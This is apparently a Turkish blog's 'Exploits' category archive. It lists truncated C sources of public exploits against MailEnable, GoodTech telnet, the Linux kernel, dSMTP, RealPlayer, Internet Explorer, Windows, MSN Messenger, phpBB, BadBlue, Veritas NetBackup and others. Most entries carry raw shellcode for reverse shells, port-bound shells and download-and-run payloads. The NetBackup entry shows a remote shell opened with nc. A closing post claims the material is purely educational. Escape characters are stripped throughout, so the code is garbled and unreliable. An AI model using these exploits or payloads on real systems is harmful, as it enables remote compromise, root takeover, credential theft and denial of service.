Category Archives: Exploits

MailEnable Enterprise Remote buffer overflow

  #include <stdio.h>#include <stdlib.h>#include <stdarg.h>#include <string.h>#include <sys/types.h>#include <sys/socket.h>#include <sys/time.h>#include <netinet/in.h>#include <arpa/inet.h>#include <unistd.h>#include <netdb.h>/*Connectback Shellcode ::: 316 byteLink points:Ip : [111] unsigned long (xored 0×99999999)Port: [118] unsigned short (xored 0×9999)*/unsigned char reverse_sc[] =“xEBx10x5Bx4Bx33xC9x66xB9x25x01x80x34x0Bx99xE2xFA”“xEBx05xE8xEBxFFxFFxFFx70x62x99x99x99xC6xFDx38xA9″“x99x99x99x12xD9x95x12xE9x85x34x12xF1x91x12x6ExF3″“x9DxC0x71x02x99x99x99x7Bx60xF1xAAxABx99x99 xF1xEE”“xEAxABxC6xCDx66x8Fx12x71xF3x9DxC0x71x1Bx99x99x99″“x7Bx60x18x75x09x98x99x99xCDxF1x98x98x99x99x66xCF”“x89xC9xC9xC9xC9xD9xC9xD9xC9x66xCFx8Dx12x41xF1xE6″“x99x99x98xF1x9Bx99x9Dx4Bx12x55xF3x89xC8xCAx66xCF”“x81x1Cx59xECxD3xF1xFAxF4xFDx99x10xFFxA9x1Ax75xCD”“x14xA5xBDxF3x8CxC0x32x7Bx64x5FxDDxBDx89xDDx67xDD”“xBDxA4x10xC5xBDxD1x10xC5xBDxD5x10xC5xBDxC9x14xDD”“xBDx89xCDxC9xC8xC8xC8xF3x98xC8xC8x66xEFxA9xC8x66″“xCFx9Dx12x55xF3x66x66xA8x66xCFx91xCAx66xCFx85x66″“xCFx95xC8xCFx12xDCxA5x12xCDxB1xE1x9Ax4CxCBx12xEB”“xB9x9Ax6CxAAx50xD0xD8x34x9Ax5CxAAx42x96x27x89xA3″“x4FxEDx91x58x52x94x9Ax43xD9x72x68xA2x86xECx7ExC3″“x12xC3xBDx9Ax44xFFx12x95xD2x12xC3x85x9Ax44x12x9D”“x12x9Ax5Cx32xC7xC0x5Ax71x99x66x66x66x17xD7x97x75″“xEBx67x2Ax8Fx34x40x9Cx57x76x57x79xF9x52x74x65xA2″“x40x90x6Cx34x75x60x33xF9x7ExE0x5FxE0″;/*Portbind Shellcode ::: 492 byteLink points:Port: [266] unsigned … Continue reading


GoodTech telnet remote server buffer overflow

 #include <stdio.h>#include <sys/socket.h>#include <netinet/in.h>#include <netdb.h>/*** definitions**/#define PORT 2380#define RED “E[31mE[1m”#define GREEN “E[32mE[1m”#define YELLOW “E[33mE[1m”#define BLUE “E[34mE[1m”#define NORMAL “E[m”/*** prototypes**/int exploit ( int s, unsigned long ip, unsigned short cbport, intoption );int shell ( int s, char* tip, unsigned short cbport … Continue reading


Linux Kernel Bluetooth Socket Creation

 #include <sys/klog.h>#include <sys/types.h>#include <unistd.h>#include <stdlib.h>#include <sys/socket.h>#include <bluetooth/bluetooth.h>#include <bluetooth/hci.h>#include <bluetooth/hci_lib.h>#include <sys/utsname.h>#define BRKVAL 0x0cec9000 //should be enough but fix it if you get an errorvoid usage(char *path);//due to changing task_structs we need different offsetschar k_give_root[] = //—-[ give root in ring0/tested onlinux2.6.5/x86/ … Continue reading


Snooker 1.68 password disclosure

 #include <stdio.h>#include <string.h>#include <windows.h>HKEY hKey;#define BUFSIZE 100char prgfiles[BUFSIZE];DWORD dwBufLen=BUFSIZE;LONG lRet;int main(){if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,“SOFTWAREMicrosoftWindowsCurrentVersion”,0,KEY_QUERY_VALUE,&hKey) == ERROR_SUCCESS){lRet = RegQueryValueEx( hKey, “ProgramFilesDir”, NULL,NULL,(LPBYTE) prgfiles, &dwBufLen);if( (lRet != ERROR_SUCCESS) || (dwBufLen >BUFSIZE) ){RegCloseKey(hKey);printf(“An error occured. Can’t getpassword! “);return -1;}RegCloseKey(hKey);}else{printf(“An error occured. Can’t get password! “);return -1;}char … Continue reading


iPool Telnet Password Disclosure

 #include <stdio.h>#include <string.h>#include <windows.h>HKEY hKey;#define BUFSIZE 100char prgfiles[BUFSIZE];DWORD dwBufLen=BUFSIZE;LONG lRet;int main(){if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,“SOFTWAREMicrosoftWindowsCurrentVersion”,0,KEY_QUERY_VALUE,&hKey) == ERROR_SUCCESS){lRet = RegQueryValueEx( hKey, “ProgramFilesDir”, NULL,NULL,(LPBYTE) prgfiles, &dwBufLen);if( (lRet != ERROR_SUCCESS) || (dwBufLen >BUFSIZE) ){RegCloseKey(hKey);printf(“An error occured. Can’t getpassword! “);return -1;}RegCloseKey(hKey);}else{printf(“An error occured. Can’t get password! “); return … Continue reading


dSMTP-SMTP MailServer 3.1b Linux Remote Root Format String

 Baslamadan önce exploit() fonksiyonu içindeki şifreyi değiştirin derim.     #include <stdio.h>#include <sys/socket.h>#include <sys/types.h>#include <sys/stat.h>#include <fcntl.h>#include <netinet/in.h>#include <netdb.h>#include <unistd.h>#define NOP 0×90#define RED “E[31mE[1m”#define GREEN “E[32mE[1m”#define YELLOW “E[33mE[1m”#define BLUE “E[34mE[1m”#define NORMAL “E[m”int connect_to_remote_host ( char* tip, unsigned short tport );int exploit … Continue reading


RealPlayer File SMIL File Handling Remote buffer overflow

 #include <stdio.h>#include <stdlib.h>#include <string.h>char pre[]=“<smil> “” <head> “” <layout> “” <region id=”a” top=”5″ /> “” </layout> “” </head> “” <body> “” <text src=”1024_768.en.txt” region=”size” system-screen-size=””;char shellcode[]=/* bindshell port 13579 thx to metasploit.com restricted chars: 0×00, 0×90, 0xa0, 0×20, 0x0a, 0x0d, … Continue reading


Internet Explorer CSS Remote Buffer overflow

 #include <stdio.h>#include <string.h>#include <tchar.h>char bug[]=“x40x63x73x73x20x6Dx6Dx7Bx49x7Bx63x6Fx6Ex74x65x6Ex74x3Ax20x22x22x3Bx2F”“x2Ax22x20x22x2Ax2Fx7Dx7Dx40x6Dx3Bx40x65x6Ex64x3Bx20x2Fx2Ax22x7Dx7Dx20x20x20″;///////////////////////////////////////////////////////*shellcode :MessageBox (0,”hack ie6″,0,MB_OK);-XOR EBX,EBXPUSH EBX ; 0PUSH EBX ; 0ADD AL,0FPUSH EAX ; Msg ” Hack ie6 “PUSH EBX ;0JMP 746D8E72 ;USER32.MessageBoxA*/char shellcode[]= “x33xDBx53x53x04x0Fx50x53xE9xCBx8Dx6Dx74″“x90x90x48x61x63x6Bx20x69x65x36x20x63x73x73″;////////////////////////////////////////////////////////// return address :: esp+1AC :: start shellcode//MOV EAX,ESP//ADD AX,1AC//CALL EAXchar ret[]= … Continue reading


Microsoft Windows XP/2003 Remote DoS

 #define _BSD_SOURCE#include <stdio.h>#include <ctype.h>#include <sys/socket.h>#include <netinet/in.h>#include <netinet/in_systm.h>#include <netinet/ip.h>#include <netinet/tcp.h>#include <sysexits.h>#include <stdlib.h>#include <unistd.h>#include <sys/types.h>/*Windows Server 2003 and XP SP2 remote DoS exploitTested under OpenBSD 3.6 at WinXP SP 2Vuln by Dejan Levaja <dejan_@_levaja.com>(c)oded by __blf 2005 RusH Security Team , http://rst.void.ruGr33tz: … Continue reading


MSN 6.2 OverFlow

  #include <stdio.h>#include <stdlib.h>#include <conio.h>#include <string.h>#ifdef __BORLANDC__#include <mem.h>#endif#define NOP 0×90char png_header[] =“x89x50x4Ex47x0Dx0Ax1Ax0Ax00x00x00x0Dx49x48x44x52″“x00x00x00x40x00x00x00x40x08x03x00x00x00x9DxB7x81″“xECx00x00x01xB9x74x52x4Ex53″;char pngeof[] = “x90x90x90x59xE8x47xFExFFxFF”;/* Generic win32 http download shellcodexored with 0x1d by delikon (http://delikon.de/) */char shellcode[] = “xEB” “x10x58x31xC9x66x81xE9x22xFFx80x30x1Dx40xE2xFAxEBx05xE8xEBxFF”“xFFxFFxF4xD1x1Dx1Dx1Dx42xF5x4Bx1Dx1Dx1Dx94xDEx4Dx75x93x53x13″“xF1xF5x7Dx1Dx1Dx1Dx2CxD4x7BxA4x72x73x4Cx75x68x6Fx71x70x49xE2″“xCDx4Dx75x2Bx07x32x6DxF5x5Bx1Dx1Dx1Dx2CxD4x4Cx4Cx90x2Ax4Bx90″“x6Ax15x4Bx4CxE2xCDx4Ex75x85xE3x97x13xF5x30x1Dx1Dx1Dx4Cx4AxE2″“xCDx2CxD4x54xFFxE3x4Ex75x63xC5xFFx6ExF5x04x1Dx1Dx1DxE2xCDx48″“x4Bx79xBCx2Dx1Dx1Dx1Dx96x5Dx11x96x6Dx01xB0x96x75x15x94xF5x43″“x40xDEx4Ex48x4Bx4Ax96x71x39x05x96x58x21x96x49x18x65x1CxF7x96″“x57x05x96x47x3Dx1CxF6xFEx28x54x96x29x96x1CxF3x2CxE2xE1x2CxDD”“xB1x25xFDx69x1AxDCxD2x10x1CxDAxF6xEFx26x61x39x09x68xFCx96x47″“x39x1CxF6x7Bx96x11x56x96x47x01x1CxF6x96x19x96x1CxF5xF4x1Fx1D”“x1Dx1Dx2CxDDx94xF7x42x43x40x46xDExF5x32xE2xE2xE2x70x75x75x33″“x78x65x78x1D”;FILE *di;int i = 0;short int weblength;char *web;char *pointer = NULL;char … Continue reading


phpBB2.0 Session Handler

  #include <stdio.h>#include <stdlib.h>#include <string.h>int main(int argc, char** argv[]) {FILE *pointer;char contenido[10000],cookie[91]=”a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22″,cookief[9]=”%22%3B%7D”, cookiec[106],cookie_false[92]=”a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D”,*pos;int p=0, i=0;if (argc!=2) {printf(“Usage: phpbb_exploit.exe user_id “);exit(0);}pointer=fopen(“cookies.txt”, “r”);if (pointer) {fread(contenido, 300, 10, pointer);fclose(pointer);} else {printf(“The file can’t be open “);exit(0);}strcpy(cookiec, cookie);strncat(cookiec, argv[1], 6);strcat(cookiec, cookief);if (pos=strstr(contenido, cookiec)) {p=pos … Continue reading


BadBlue – Remote buffer overflow

 #include <winsock2.h>#include <windows.h>#include <stdio.h>#pragma comment (lib,”ws2_32″)#define TIMEOUT 1#define VALIDSERVER “BadBlue/2.5″#define GETHEADER “HEAD HTTP/1.1 “#define HTTPSEND1 “GET /ext.dll?mfcisapicommand=”#define HTTPSEND2 “&page=index.htx HTTP/1.1 Accept: */* Accept-Language: es Accept-Encodin: gzip, deflate User-Agent: Haxorcitos/1.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: “#define HTTPSEND3 ” Connection: … Continue reading


VERITAS NetBackup Remote Buffer Overflow

Targeted port : 13701/*DESCRIPTIONVeritas NetBackup Stack Overflow (tcp/13701)“Volume Manager Daemon” ModuleUSAGEC:NetBackup>nb 192.168.0.2 4444 192.168.0.200 0Veritas NetBackup v4/v5 “Volume Manager Daemon” Stack Overflow.C:NetBackup>nc 192.168.0.200 4444Microsoft Windows 2000 [versie 5.00.2195](C) Copyright 1985-2000 Microsoft Corp.C:WINNTsystem32>INFORMATIONI wrote this just for educational purposes .Because the … Continue reading


Windows Metafile Remote File Download

#include <stdio.h>#include <winsock2.h>#pragma comment(lib, “ws2_32″)// Use for find the ASM code#define PROC_BEGIN __asm _emit 0×90 __asm _emit 0×90__asm _emit 0×90 __asm _emit 0×90__asm _emit 0×90 __asm _emit 0×90__asm _emit 0×90 __asm _emit 0×90#define PROC_END PROC_BEGIN#define SEARCH_STR “x90x90x90x90x90x90x90x90x90″#define SEARCH_LEN 8#define MAX_SC_LEN … Continue reading


Exploit Dizininin Amacı: Okuyun

Buraya exploitlerin eklenmesindeki neden eğitimden başka hiçbir şey değildir. Lütfen yanlış yorumlamayınız. Exploit kodlarından nasıl eğitim olur diye sormayı düşünüyorsanız eğer, sormamanızı tavsiye ederim. Çünkü bundan eğitim olamayacağını düşünüyorsanız işin çok başındasınız derim. Belirli bir programlama seviyesine ulaştıktan sonra herhangi bir … Continue reading
